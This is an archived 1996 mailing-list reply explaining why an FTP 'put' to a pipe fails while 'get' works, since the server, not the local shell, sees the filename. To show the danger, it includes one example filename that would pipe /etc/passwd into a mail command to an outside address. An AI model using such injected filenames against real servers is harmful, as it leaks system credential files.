[ale] ftp and pipes

dZothMuellarg zot at crl.com
Thu Nov 14 14:51:06 EST 1996


^
^I'm trying to do the following
^
^get filname "|lp -d lj4_1"   
^
^it works

Becuase it is going to a local (as in you are in your shell) pipe

^but
^put filename "|lp -d lj4_1"
^does not work.  

Becuase it is going to the ftp server (not a shell) and the ftp server
must deal with it, what it sees is a filename with |.

What might work is put filename, then use site exec lp if lp is setup
(and the ftpd is to).

Other whise what would happen to put file name "|mail zot at crl.com -s
Passwords < /etc/passwd"

^Does ne1 know why?
^
^
^Thanks,
^Christopher Fowler
^------------------------------------------------------------------------
^To contact me:  cfowler at www.topform.com
^Computer Software, INC. * 303 Research Drive * Norcross, GA 30092
^Phone: (770) 448-1484 * FAX: (770) 448-3949
^http://www.topform.com 
^------------------------------------------------------------------------
^


-- 
Later,
ZOT                                                        zot at crl.com
Home Page:   http://www.crl.com/~zot/home.html
Improv Page: http://www.crl.com/~zot/improv.html






More information about the Ale mailing list